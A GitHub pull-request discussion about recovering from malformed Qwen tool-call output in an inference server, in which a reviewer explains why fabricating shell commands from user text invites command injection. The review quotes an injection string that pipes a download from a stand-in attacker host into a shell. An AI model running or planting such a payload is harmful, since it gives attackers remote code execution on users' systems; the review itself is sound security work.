fix: Qwen tool streaming recovery #497
Conversation
Stack:
I ran into a scenario where asking the model to run a bash command ("list the files in this folder") while streaming resulted in corrupted output. This PR addresses that. I've attempted to follow your guide for contributing. Please let me know if anything is missing.
janhilgard
left a comment
Thanks for the contribution and for following the guide! I understand the frustration with empty `<tool_call></>` wrappers — it's a real model failure case. However, this PR takes an approach that's architecturally dangerous for an inference server. Here's why:
Critical: Server-side tool call synthesis is fundamentally wrong
The core of this PR makes the inference server guess which tool the model meant to call and fabricate arguments. This violates the basic contract of an OpenAI-compatible API: the server faithfully reports what the model generates — it never invents content.
Security: Command injection
The synthesis logic extracts paths from user text via regex and inserts them into shell commands:
```python
args["command"] = f"ls -la {_shell_quote_path(target)}"
```
A malicious (or just unlucky) user message like:
```
list files in ~/'; curl attacker.com/pwn | sh; echo '
```
…gets turned into a synthesized bash command by the server. The client trusts tool calls because they came from the model — here they didn't. The `_shell_quote_path` function won't catch all edge cases (it never can when the server is fabricating shell commands).
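To make the risk concrete, here is a minimal sketch of the failure mode. The `_extract_target` regex below is hypothetical (the PR's actual extraction logic may differ), but any pattern that pulls a "path" out of free-form user text can capture attacker-controlled shell metacharacters:

```python
import re
import shlex

def _extract_target(user_text):
    # Hypothetical sketch of the kind of regex extraction the PR performs:
    # grab everything after "in"/"of" and treat it as a filesystem path.
    m = re.search(r"(?:in|of)\s+(.+)$", user_text)
    return m.group(1) if m else None

user_msg = "list files in ~/'; curl attacker.com/pwn | sh; echo '"
target = _extract_target(user_msg)

# Without quoting, the attacker-controlled text lands verbatim in the command:
naive = f"ls -la {target}"

# Quoting (e.g. shlex.quote) narrows the blast radius, but the server is
# still executing a command the model never generated, so the API contract
# is already broken before any quoting happens.
quoted = f"ls -la {shlex.quote(target)}"

print(naive)
```

Running this prints the fully injectable command string, which is exactly what a client would then execute on the model's supposed behalf.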
Architectural: Hallucinating on behalf of the model
If the model emits an empty `<tool_call></tool_call>`, the correct responses are:
- Return any text before the marker as content
- Log a warning about malformed tool output
- Let the client/agent framework decide what to do (retry, fallback, etc.)
The server should never decide "the model probably meant bash" based on fuzzy heuristics like regex-matching `list|show|ls|dir` in the user message. This breaks:
- Deterministic reproducibility (same generation → different behavior depending on user text)
- Client trust (tool calls are no longer reliably from the model)
- Audit trails (who called the tool — the model or the server?)
Streaming deferral is too broad
The `defer_content_until_finish` flag triggers for all responses after tool messages — not just the broken case. This defeats streaming entirely for multi-turn tool-use conversations (which are the majority use case for tool-calling agents), turning every response into a single final chunk.
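A narrower alternative keeps post-tool turns incremental. Assuming the decoder exposes the cumulative decoded text at each step (an assumption — the actual streaming loop in this repo may be structured differently), deltas can be derived by tracking how much has already been sent:

```python
def stream_deltas(cumulative_texts):
    """Yield only the newly decoded suffix at each step.

    Hypothetical sketch: instead of buffering the whole response behind a
    defer_content_until_finish flag, remember how much text has already
    been emitted and send just the difference, so multi-turn tool-use
    conversations still stream token by token.
    """
    sent = 0
    for text in cumulative_texts:
        delta = text[sent:]
        sent = len(text)
        if delta:
            yield delta

print(list(stream_deltas(["He", "Hell", "Hello!"])))  # → ['He', 'll', 'o!']
```

This preserves the single-final-chunk behavior only when a step genuinely produces no new text.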
What to do instead
The real fix is much simpler:
- When the parser encounters `<tool_call></>` or `<tool_call></tool_call>` with no content, treat it as content (not a tool call) — the model failed to generate a proper tool invocation.
- Optionally strip the empty XML wrapper from the returned content.
- Log a warning:
```python
logger.warning("Model emitted empty tool_call wrapper, treating as content")
```
The client/agent (in your case "Pi Agent") can then see the empty/garbled response and retry the request. This is the correct layer for recovery logic — the agent framework, not the inference server.
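The suggested behavior above can be sketched in a few lines. This is a hypothetical helper, not the repo's actual parser; the regex and return shape are illustrative assumptions:

```python
import logging
import re

logger = logging.getLogger(__name__)

# Matches both failure shapes from the review: <tool_call></> and
# <tool_call></tool_call> with nothing (or only whitespace) inside.
_EMPTY_WRAPPER = re.compile(r"<tool_call>\s*</(?:tool_call)?>")

def recover_empty_tool_call(text):
    """Treat an empty <tool_call> wrapper as plain content, never a tool call.

    Returns a dict when the empty-wrapper case is detected, else None
    (meaning normal tool-call parsing should proceed).
    """
    if _EMPTY_WRAPPER.search(text):
        logger.warning("Model emitted empty tool_call wrapper, treating as content")
        # Strip the wrapper; any surrounding text is returned as content.
        return {"content": _EMPTY_WRAPPER.sub("", text).strip(), "tool_calls": []}
    return None
```

Crucially, `tool_calls` is always empty here: the server reports the generation failure and leaves recovery (retry, fallback) to the client.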
Minor: Good parts
- Hoisting `request.model_dump()` into `request_dict` once (instead of calling it repeatedly) is a nice perf improvement — I'd accept that as a standalone change.
- The `try/except TypeError` fallback for the `request=` kwarg is a reasonable compatibility shim if the streaming parser API genuinely needs request context (for non-synthesis purposes).
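For reference, that compatibility shim pattern looks something like the following. The function and parser interface here are hypothetical stand-ins for whatever the PR actually wraps:

```python
def parse_with_optional_request(parser, text, request=None):
    # Hypothetical compatibility shim: newer streaming parsers may accept a
    # request= kwarg for extra context, older ones do not. Try the richer
    # call first and fall back when the signature rejects it.
    try:
        return parser.parse(text, request=request)
    except TypeError:
        return parser.parse(text)
```

One caveat with this pattern: a `TypeError` raised *inside* a new-style parser would be silently masked by the fallback, so inspecting the signature (e.g. via `inspect.signature`) is a stricter alternative.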
tl;dr: An inference server must never fabricate tool calls. The empty-wrapper case should be treated as a generation failure and returned as content (or an empty response), letting the client decide how to recover.
Remove server-side synthesis for empty Qwen XML tool wrappers so the inference server no longer guesses tool names or fabricates arguments. Malformed empty wrappers now produce no tool calls and log a warning, leaving recovery to the client or agent framework. Keep post-tool chat streaming incremental by deriving deltas from cumulative decoded text instead of deferring the entire response until the final chunk. Add regression coverage for empty wrapper handling, no synthesized shell commands, and post-tool streaming behavior.
7138147 to ce33946
Thanks for the thorough review; there are a lot of good points here. A bunch of this actually overlaps with an update I already had in flight, so I've folded your feedback into that update. Really appreciate the eye on it.
Summary
Tests
```shell
uv run ruff check vllm_mlx/ tests/ --select E,F,W --ignore E402,E501,E731,F811,F841
uv run black --check vllm_mlx/ tests/
uv run pytest tests/test_qwen3_xml_parser.py tests/test_server.py
```
Notes
- `uv run mypy vllm_mlx/ --ignore-missing-imports --no-error-summary` still reports the repository's existing broad type-check baseline; CI marks that job continue-on-error.
- `uv run pre-commit run --all-files` also fails on existing full-repo hook issues: old Ruff hook argument parsing, broad line-length findings, and the same Mypy baseline. The CI-equivalent Ruff and Black checks above pass.